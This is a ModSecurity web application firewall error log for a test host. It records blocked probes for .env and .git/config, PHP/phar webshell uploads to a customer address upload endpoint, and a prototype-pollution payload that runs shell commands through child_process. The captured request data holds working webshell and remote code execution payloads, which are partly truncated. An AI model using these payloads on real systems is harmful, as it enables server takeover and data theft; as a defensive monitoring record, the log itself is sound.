[Tue Dec 16 08:17:25.722211 2025] [:error] [pid 772688] [client 128.199.182.152:35814] [client 128.199.182.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUEHhbkrl1QSV07OkBzCbgAAAA0"]
[Tue Dec 16 08:17:26.765190 2025] [:error] [pid 772711] [client 128.199.182.152:35828] [client 128.199.182.152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUEHhnHrokBbbPURYRsbpwAAACM"]
[Tue Dec 16 08:17:26.765436 2025] [:error] [pid 772711] [client 128.199.182.152:35828] [client 128.199.182.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUEHhnHrokBbbPURYRsbpwAAACM"]
[Tue Dec 16 08:17:26.765590 2025] [:error] [pid 772711] [client 128.199.182.152:35828] [client 128.199.182.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUEHhnHrokBbbPURYRsbpwAAACM"]
[Tue Dec 16 08:17:28.793469 2025] [:error] [pid 772716] [client 128.199.182.152:35832] [client 128.199.182.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUEHiHVqtVc_N3uDWJg0bQAAACg"]
[Tue Dec 16 08:17:28.793699 2025] [:error] [pid 772716] [client 128.199.182.152:35832] [client 128.199.182.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUEHiHVqtVc_N3uDWJg0bQAAACg"]
[Tue Dec 16 08:17:28.793857 2025] [:error] [pid 772716] [client 128.199.182.152:35832] [client 128.199.182.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUEHiHVqtVc_N3uDWJg0bQAAACg"]
[Tue Dec 16 08:37:43.013069 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Rule 7f4cc9ba2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aUEMR3HrokBbbPURYRsbqwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:43.013648 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aUEMR3HrokBbbPURYRsbqwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:43.016235 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aUEMR3HrokBbbPURYRsbqwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:43.016572 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aUEMR3HrokBbbPURYRsbqwAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:43.711956 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 0d88364f428d25.php8 found within FILES:custom_attributes[country_id]: 0d88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUEMR3HrokBbbPURYRsbrAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Tue Dec 16 08:37:43.712643 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUEMR3HrokBbbPURYRsbrAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Tue Dec 16 08:37:43.712820 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUEMR3HrokBbbPURYRsbrAAAACM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Tue Dec 16 08:37:45.754632 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Rule 7f4cc9ba2be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aUEMSXHrokBbbPURYRsbrQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:45.755136 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aUEMSXHrokBbbPURYRsbrQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:45.757692 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aUEMSXHrokBbbPURYRsbrQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 08:37:45.757890 2025] [:error] [pid 772711] [client 46.149.66.101:41790] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aUEMSXHrokBbbPURYRsbrQAAACM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 16 15:50:14.206233 2025] [:error] [pid 772734] [client 54.193.87.240:56210] [client 54.193.87.240] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFxpjN7bCTU4pmWUN9EZAAAAAI"]
[Tue Dec 16 15:50:14.206743 2025] [:error] [pid 772734] [client 54.193.87.240:56210] [client 54.193.87.240] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "autumnus.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFxpjN7bCTU4pmWUN9EZAAAAAI"]
[Tue Dec 16 15:50:14.207685 2025] [:error] [pid 772734] [client 54.193.87.240:56210] [client 54.193.87.240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFxpjN7bCTU4pmWUN9EZAAAAAI"]
[Tue Dec 16 15:50:14.207853 2025] [:error] [pid 772734] [client 54.193.87.240:56210] [client 54.193.87.240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps"] [unique_id "aUFxpjN7bCTU4pmWUN9EZAAAAAI"]
[Wed Dec 17 02:16:50.453088 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Rule 7f4cca078be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.phar"] [unique_id "aUIEgm83QfEhMowdM5WxXQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:50.453592 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.phar"] [unique_id "aUIEgm83QfEhMowdM5WxXQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:50.456139 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.phar"] [unique_id "aUIEgm83QfEhMowdM5WxXQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:50.456334 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.phar"] [unique_id "aUIEgm83QfEhMowdM5WxXQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:51.051750 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: gp88364f428d25.php8 found within FILES:custom_attributes[country_id]: gp88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUIEg283QfEhMowdM5WxXgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/g/p/gp88364f428d25.phar
[Wed Dec 17 02:16:51.052404 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUIEg283QfEhMowdM5WxXgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/g/p/gp88364f428d25.phar
[Wed Dec 17 02:16:51.052591 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUIEg283QfEhMowdM5WxXgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/g/p/gp88364f428d25.phar
[Wed Dec 17 02:16:52.274759 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Rule 7f4cca078be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.php8"] [unique_id "aUIEhG83QfEhMowdM5WxXwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:52.275220 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.php8"] [unique_id "aUIEhG83QfEhMowdM5WxXwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:52.277536 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.php8"] [unique_id "aUIEhG83QfEhMowdM5WxXwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 17 02:16:52.277718 2025] [:error] [pid 787547] [client 93.175.201.83:61535] [client 93.175.201.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/g/p/gp88364f428d25.php8"] [unique_id "aUIEhG83QfEhMowdM5WxXwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
